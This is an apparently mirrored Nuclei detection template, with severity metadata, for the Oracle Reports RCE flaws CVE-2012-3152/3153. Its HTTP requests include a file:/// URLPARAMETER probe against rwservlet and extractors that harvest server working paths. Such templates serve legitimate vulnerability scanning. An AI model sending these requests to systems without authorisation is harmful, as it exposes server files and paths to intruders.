Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)

2021-06-2108:48:42

ProjectDiscovery

github.com

5.8 Medium

AI Score

Confidence

Low

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.974 High

EPSS

Percentile

99.9%

JSON

An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,

id: CVE-2012-3153

info:
  name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
  author: Sid Ahmed MALAOUI @ Realistic Security
  severity: medium
  description: |
    An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
    11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
    vectors related to Report Server Component.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
  remediation: |
    Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
    - https://www.exploit-db.com/exploits/31737
    - https://www.oracle.com/security-alerts/cpuoct2012.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
    - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2012-3153
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.95986
    epss-percentile: 0.99354
    cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: fusion_middleware
  tags: cve,cve2012,oracle,rce,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/reports/rwservlet/showenv"
      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Reports Servlet")'

      - type: dsl
        dsl:
          - '!contains(body_2, "<html")'
          - '!contains(body_2, "<HTML")'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: windows_working_path
        regex:
          - ".?.?\\\\.*\\\\showenv"

      - type: regex
        name: linux_working_path
        regex:
          - "/.*/showenv"
# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950